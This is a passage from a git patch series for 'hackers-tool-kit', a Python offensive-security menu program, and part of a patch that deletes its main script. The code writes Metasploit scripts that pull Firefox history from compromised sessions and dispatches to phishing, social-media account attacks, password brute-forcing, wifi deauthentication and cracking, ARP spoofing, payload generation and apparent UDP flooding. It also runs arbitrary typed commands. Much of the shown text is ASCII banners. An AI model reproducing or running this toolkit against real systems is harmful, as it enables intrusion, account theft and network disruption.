>> foxhisses.rc') + os.system('echo "exit\n" >> foxhisses.rc') + os.system("service postgresql restart") + os.system('msfconsole -q -r foxhisses.rc') + os.system('rm -rf foxhisses.rc') + print "\n" + ses = raw_input("Session: ") + print "\nMaximum time (seconds) to wait for a response\n" + time = raw_input("Timeout: ") + os.system('echo "use firefox/gather/history\n" >> foxhis.rc') + os.system('echo "set session {0}\n" >> foxhis.rc'.format(ses)) + os.system('echo "set timeout {0}\n" >> foxhis.rc'.format(time)) + os.system('echo "run\n" >> foxhis.rc') + os.system('msfconsole -q -r foxhis.rc') + os.system('rm -fr foxhis.rc') +#----------# +#FOXHIS END# + + +#RHAWK START# +#-----------# +def rhawk(): + os.system("cd /root/hackers-tool-kit/redhawk/ && php rhawk.php") +#---------# +#RHAWK END# + + +#NANO START# +#----------# +def nano(): + print "opening nano in \033[93m/root/\033[0m folder" + os.system("sleep 2") + os.system("cd /root/ && nano") +#--------# +#NANO END# + + +#UPDATE HACKERS-TOOL-KIT START# +#-----------------------------# +def update(): + os.system("cd /root/hackers-tool-kit/ && python htkupdate.py") +#---------------------------# +#UPDATE HACKERS-TOOL-KIT END# + +#COMPILE C START# +#---------------# +def compilec(): + print "filename / filepath" + r = raw_input("> ") + print "\nfilename2 / filepath2" + h = raw_input("> ") + + a = 'g++ {0} -o {1}'.format(r,h) + os.system(a) +#COMPILE C END# +#-------------# + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@tuf_unkn0wn\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + if x == "pyload": + pyload() + if x == "foxhis": + foxhis() + if x == "rhawk": + rhawk() + if x == "nano": + nano() + if x == "update": + update() + if x == "compilec": + compilec() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 66e1218ce39e1e20f83916cf2713432c55682e4b Mon Sep 17 00:00:00 2001 From: tuf_unkn0wn <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 30 Jun 2019 06:01:08 +0100 Subject: [PATCH 179/214] Delete htk.py --- htk.py | 3229 -------------------------------------------------------- 1 file changed, 3229 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 2527b3a..0000000 --- a/htk.py +++ /dev/null @@ -1,3229 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @tuf_unkn0wn -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#WARNING START# -#-------------# -from tkinter import * -win = Tk() -warn ='I AM NOT RESPONSIBLE FOR ANY DAMAGE CAUSED WITH THIS TOOL WHATEVER YOU DO WITH THIS TOOL IS ON YOU' -messageVar = Message(win, text = warn) -messageVar.config(bg='red') -messageVar.pack( ) -win.title('HTK: Warning!') -button = Button(win, text='OK', width=25, command=win.destroy) -button.pack() -win.mainloop() -#-----------# -#WARNING END# - -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """ - type ? for help -\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - type ? for help - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - - type ? for help - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - type ? for help - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner8(): - print """ - type ? for help\033[91m - -@@@ /$$ /$$ @@@ -@@@ | $$ | $$ @@@ -@@! | $$ | $$ @@! -!@! | $$$$$$$$ !@! -!!@ | $$__ $$ !!@ -!!! | $$ | $$ !!! -!!: | $$ | $$ !!: -:!: |__/ |__/ :!: -@@@ @@@\033[94m -@@@ @@@ -@@! @@! -!@! /$$$$$$$$ !@! -!!@ |__ $$__/ !!@ -!!! | $$ !!! -!!: | $$ !!: -:!:---------------| $$---------------:!: -@@@ | $$ @@@ -@@@ | $$ @@@ -@@! |__/ @@! -!@! !@!\033[91m -!!@ !!@ -!!! /$$ /$$ !!! -!!: | $$ /$$/ !!: -:!: | $$ /$$/ :!: -@@@ | $$$$$/ @@@ -@@@ | $$ $$ @@@ -@@! | $$\ $$ @@! -!@! | $$ \ $$ !@! -!!@ |__/ \__/ !!@ -!!! !!! -!!: !!: -:!: :!:\033[92m - :: :: -: @tuf_unkn0wn :\033[0m -""" -def mainbanner9(): - print """ -\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ -║ ║ -\033[33m║ ║ -║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ -\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ -║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ -\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ -║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ -\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ -║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ -\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ -║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ -\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ -║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ -\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ -║\033[0m █ ▐ ▀ █ ▐ \033[95m║ -\033[35m║\033[0m ▐ ▐ \033[35m║ -║ ║\033[1;31m -╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m - type ? for help - """.decode('utf-8') - -def mainbanner10(): - print """\033[0m - ░░░▓█▒░▒▒▒▓▓░ - ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ - ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ - ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ - ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ - ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ - ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ - ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ - ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ - ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ - ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ - ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ - ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ - ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ - ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ - ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ - ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ - ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ - ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ - ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ - ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ - ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ - ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ - ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ - ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ - ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ - ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ - ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ - ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ - ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ - ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ - ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ - ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ - ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ - ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ - ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ - ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ - ░█▓▓▓▓▓▓███████▓██▓██░ - ░██▓▓▓████████████████░░░ - ░▓▓▓▓▓███████▓█▓████████░ ░░░ - ░░░█▓█████████████████████████▓▓▓▒░░░░░░ - ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ - ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ - ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ - ░░▓█▓█▓█████████████████████████████░░ - \033[0m""".decode('utf-8') -def mainbanner11(): - print """\033[91m - ██████╗ ██████╗ ██████╗ - ██╔════╝ ██╔════╝ ██╔════╝ - ███████╗ ███████╗ ███████╗ - ██╔═══██╗██╔═══██╗██╔═══██╗ - ╚██████╔╝╚██████╔╝╚██████╔╝ - ╚═════╝ ╚═════╝ ╚═════╝ - ░░░░ ░░░░░ - ░▒███████▓▒░░ ░░░████████▓░░░ - ░▓████████████▒░░ ░░█████████████░░ - ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ - ░ ░██████▒░ ░░░░███████ ░░ - ░░███████░░ ░░██████▓░ - ░███████░░ ░▒██████▒ - ░░░░ ░░███████░░░███████▒░ ░░░ - ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ - ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ - ░▒██████████████▒████████▒██████████████░░ - ░░██████████████▒░███▒▒▒█████████████░░ - ░░░░▓████████░█░▓▓▒████████▒░░░░░ - ░░████████▓░██░████████▒░░░ - ░░▒██████░▒▒░░▒░░██████░ - ░░█████████▓░█░████▓███▓░ - ░▒█▓░▒██████▒███████░░█▓░ - ░░░███████████████████▓░░ - ░▒▓████████████████▒░ - ░░▒███████████████▓▒░ - ░▒█████▓██████░░ - ░██████████░ - @tuf_unkn0wn ░█████████▒ type ? for help - █████████░░ - ░░████████░░ - ░▓█████▓░ - ░▓████▒░ - ░░████░ - ░░░▒██░░ - ░█▓░ - ░░▓░░ - ░░░░░ - ░░ - \033[0m""".decode('utf-8') -def mainbanner12(): - print """\033[91m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ -╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ - - - """.decode('utf-8') -def mainbanner13(): - print """\033[92m - - -██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ -██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ -███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ -██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ -██║ ██║██║ ██║╚██████╗██║ 